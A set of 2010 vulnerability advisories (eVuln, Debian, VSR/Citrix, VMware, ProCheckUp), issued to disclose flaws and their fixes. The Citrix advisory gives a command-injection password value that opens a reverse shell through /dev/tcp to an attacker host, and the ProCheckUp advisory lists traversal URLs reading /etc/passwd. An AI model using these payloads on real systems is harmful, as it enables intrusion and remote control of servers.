www.eVuln.com : HTTP Response Splitting in Social Share
www.eVuln.com advisory: HTTP Response Splitting in Social Share Summary: http://evuln.com/vulns/168/summary.html Details: http://evuln.com/vulns/168/description.html ---Summary--- eVuln ID: EV0168 Software: Social Share Vendor: n/a Version: 2010-06-05 Critical Level: low Type: HTTP Response Splitting Status: Unpatched. No reply from developer(s) PoC: Available Solution: Not available Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ ) Description $_SERVER["HTTP_REFERER"] value is included in an HTTP response header sent to a web user without being validated for malicious characters. Vulnerable script: vote.php PoC/Exploit PoC code is available at: http://evuln.com/vulns/168/exploit.html -Solution-- Not available --Credit--- Vulnerability discovered by Aliaksandr Hartsuyeu http://evuln.com/penetration-test.html - website penetration testing service
[SECURITY] [DSA 2135-1] New xpdf packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2135-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff December 21, 2010 http://www.debian.org/security/faq - Package: xpdf Vulnerability : several Problem type : local(remote) Debian-specific: no CVE Id(s) : CVE-2010-3702 CVE-2010-3704 Joel Voss of Leviathan Security Group discovered two vulnerabilities in xpdf rendering engine, which may lead to the execution of arbitrary code if a malformed PDF file is opened. For the stable distribution (lenny), these problems have been fixed in version 3.02-1.4+lenny3. For the upcoming stable distribution (squeeze) and the unstable distribution (sid), these problems don't apply, since xpdf has been patched to use the Poppler PDF library. We recommend that you upgrade your poppler packages. Upgrade instructions - If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk0Q5M4ACgkQXm3vHE4uyloQDACfabZRl0gOaEHypK8Ovaggiyte XHgAn18UdLjvYoXkxzbPC7NqNvsmaCg6 =UpYe -END PGP SIGNATURE-
VSR Advisories: Citrix Access Gateway Command Injection Vulnerability
VSR Security Advisory http://www.vsecurity.com/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Citrix Access Gateway Command Injection Vulnerability Release Date: 2010-12-21 Application: Citrix Access Gateway Versions: Access Gateway Enterprise Edition (up to 9.2-49.8) Access Gateway Standard & Advanced Edition (prior to 5.0) Severity: High Author: George D. Gal Vendor Status: Updated Software Released, NT4 Authentication Removed [2] CVE Candidate: CVE-2010-4566 Reference: http://www.vsecurity.com/resources/advisory/20101221-1/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description --- >From [1]: "Citrix(R) Access Gateway(TM) is a secure application access solution that provides administrators granular application-level control while empowering users with remote access from anywhere. It gives IT administrators a single point to manage access control and limit actions within sessions based on both user identity and the endpoint device, providing better application security, data protection, and compliance management." Vulnerability Overview -- On August 2nd, VSR identified a vulnerability in Citrix Access Gateway within the way user authentication credentials are handled. Under certain configuration settings it appears that user credentials are passed as arguments to a command line program to authenticate the user. A lack of data validation and the mechanism in which the external program is spawned results in the potential for command injection and arbitrary command execution on the Access Gateway. Vulnerability Details - The Citrix Access Gateway provides support for multiple authentication types. When utilizing the external legacy NTLM authentication module known as ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command line utility to verify a user's identity and password. By embedding shell metacharacters in the web authentication form it is possible to execute arbitrary commands on the Access Gateway. The following commands are executed by the ntlm_authenticator during this process: vpnadmin 10130 0.0 0.0 2104 976 ?S15:02 0:00 sh -c /usr/local/samba/bin/samedit -c 'samuser username -a' -U <>%<> -p 139 -S xxx.xxx.xxx.xxx > /tmp/samedit-samuser-stdout.50474096 2> /dev/null vpnadmin 10131 0.0 0.1 3852 1528 ?S15:02 0:00 /usr/local/samba/bin/samedit -c samuser username -a -U <>% -p 139 -S xxx.xxx.xxx.xxx By submitting a password value as shown below, it is possible to establish a reverse shell to a netcat listener: | bash -i >& /dev/tcp/<>/<> 0>&1 & Using a simple ping command in the password field an attacker could use timing attacks to verify the presence of the vulnerability: | ping -c 10 <> The ping command above will attempt to send 10 ICMP echo requests to the target host, resulting in a noticable delay easily detected by vulnerability scanners. Versions Affected - Testing was performed against a Citrix Access Gateway 2000 version 4.5.7. According to the vendor this vulnerability affects all versions of Access Gateway Enterprise Edition up to version 9.2-49.8, and all versions of the Access Gateway Standard and Advanced Editions prior to Access Gateway 5.0. Vendor Response --- The following timeline details the vendor's response to the reported issue: 2010-08-06Citrix was provided a draft advisory. 2010-08-10Citrix acknowledged receipt of draft advisory. 2010-08-16VSR follow-up to determine confirmation of issue. 2010-08-16Citrix confirmed issue. 2010-09-14VSR follow-up to determine status of issue. 2010-09-29VSR follow-up to determine status of issue. 2010-09-30Citrix confirmed continued investigation of the issue. 2010-10-19VSR follow-up to determine status of issue. 2010-10-26Citrix verified issue only exists in NT4 authentication feature. 2010-12-01VSR follow-up to determine status of issue. 2010-12-02Citrix confirmed December 14th release of security bulletin. 2010-12-14Citrix releases security bulletin. 2010-12-20CVE assigned 2010-12-21VSR releases advisory. The Citrix advisory may be obtained at: http://support.citrix.com/article/CTX127613 Recommendation -- Citrix has indicated that this vulnerability only affects legacy NT4 authentication which has been removed from the latest release of the device firmware. Common Vulnerabilities and Exposures (CVE) Information -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-4566 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgem
VMSA-2010-0020 VMware ESXi 4.1 Update Installer SFCB Authentication Flaw
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - VMware Security Advisory Advisory ID: VMSA-2010-0020 Synopsis: VMware ESXi 4.1 Update Installer SFCB Authentication Flaw Issue date:2010-12-21 Updated on:2010-12-21 CVE numbers: CVE-2010-4573 - 1. Summary VMware ESXi 4.1 Update Installer might introduce a SFCB Authentication Flaw. 2. Relevant releases VMware ESXi 4.1 if upgraded from ESXi 3.5 or ESXi 4.0 with a modified SFCB configuration file. 3. Problem Description a. ESXi 4.1 Update Installer SFCB Authentication Flaw Under certain conditions, the ESXi 4.1 installer that upgrades an ESXi 3.5 or ESXi 4.0 host to ESXi 4.1 incorrectly handles the SFCB authentication mode. The result is that SFCB authentication could allow login with any username and password combination. An ESXi 4.1 host is affected if all of the following apply: - ESXi 4.1 was upgraded from ESXi 3.5 or ESXi 4.0. - The SFCB configuration file /etc/sfcb/sfcb.cfg was modified prior to the upgrade. - The sfcbd daemon is running (sfcbd runs by default). Workaround A workaround that can be applied to ESXi 4.1 is described in VMware Knowledge Base Article KB 1031761 The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2010-4573 to this issue. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected hosted * any any not affected ESXi 4.1 ESXi see KB 1031761 for workaround ** ESXi 4.0 ESXi not affected ESXi 3.5 ESXi not affected ESXany ESX not affected * hosted products are VMware Workstation, Player, ACE, Server, Fusion. ** ESXi 4.1 is only affected if upgraded from ESXi 3.5 or ESXi 4.0 with a modified SFCB configuration file. 4. Solution Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file. ESXi 4.1 Workaround described in VMware Knowledge Base Article KB 1031761 http://kb.vmware.com/kb/1031761 5. References CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4573 - 6. Change log 2010-12-21 VMSA-2010-0020 Initial security advisory after release of VMware knowledge base article that documents workaround on 2010-12-21. - --- 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Center http://www.vmware.com/security VMware Security Advisories http://www.vmware.com/security/advisories VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2010 VMware Inc. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.16 (GNU/Linux) iEYEARECAAYFAk0RJaQACgkQS2KysvBH1xk5gwCfeuwzOhjNuAQKDY/OGqVevkFk yv4An04Kf4+MQr2Lxg1ObnrhblLZw280 =579r -END PGP SIGNATURE-
[SECURITY] [DSA-2136-1] New tor packages fix potential code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2136-1 secur...@debian.org http://www.debian.org/security/ Raphael Geissert December 21, 2010 http://www.debian.org/security/faq - Package: tor Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE Id : CVE-2010-1676 Willem Pinckaers discovered that Tor, a tool to enable online anonymity, does not correctly handle all data read from the network. By supplying specially crafted packets a remote attacker can cause Tor to overflow its heap, crashing the process. Arbitrary code execution has not been confirmed but there is a potential risk. In the stable distribution (lenny), this update also includes an update of the IP address for the Tor directory authority gabelmoo and addresses a weakness in the package's postinst maintainer script. For the stable distribution (lenny) this problem has been fixed in version 0.2.1.26-1~lenny+4. For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 0.2.1.26-6. We recommend that you upgrade your tor packages. Upgrade instructions - If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk0RRVsACgkQYy49rUbZzlp2mACeP+489ptl1vz0BQoJW1F2w9x4 K4oAnAjVvOvl898mVCeSJRhkKtEXT5nG =eMo2 -END PGP SIGNATURE-
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-04
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-04 PR10-04 Directory traversal limited to file validation within Viva thumbs WordPress add-on Advisory publicly released: Tuesday, 21 December 2010 Vulnerability found: Thursday, 4 February 2010 Vendor informed: Monday, 8 February 2010 Severity level: Low/Medium Credits Richard Brain of ProCheckUp Ltd (www.procheckup.com) Description Viva Thumbs resizes and display images, as part of a popular WordPress plugin.ProCheckUp has discovered that Viva Thumbs is vulnerable to a directory traversal attack within the image display functionality, the directory traversal attack is limited to file existence validation. Note: tested on Viva Thumbs running on the Linux operating system. Proof of concept The following demonstrate the traversal flaw: 1) Vulnerable to directory traversal http://target-domain.foo/show_image_NpAdvCatPG.php?cache=false&cat=1&filename=/../../../../../../etc/passwd http://target-domain.foo/show_image_NpAdvHover.php?cache=false&cat=0&filename=/../../../../../../etc/passwd http://target-domain.foo/show_image_NpAdvInnerSmall.php?cache=false&cat=1&filename=/../../../../../../etc/hosts http://target-domain.foo/show_image_NpAdvMainFea.php?cache=false&cat=1&filename=/../../../../../../etc/passwd http://target-domain.foo/show_image_NpAdvMainPGThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts http://target-domain.foo/show_image_NpAdvFeaThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts http://target-domain.foo/show_image_NpAdvSecondaryRight.php?cache=false&cat=1&filename=/../../../../../../etc/hosts http://target-domain.foo/show_image_NpAdvSideFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts http://target-domain.foo/show_image_NpAdvSinglePhoto.php?cache=false&cat=1&filename=/../../../../../../etc/hosts http://target-domain.foo/show_image_NpAdvSubFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts Consequences: The existance of files can be validated on the system, outside the WordPress webroot. How to fix None available References Legal Copyright 2010 ProCheckUp Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.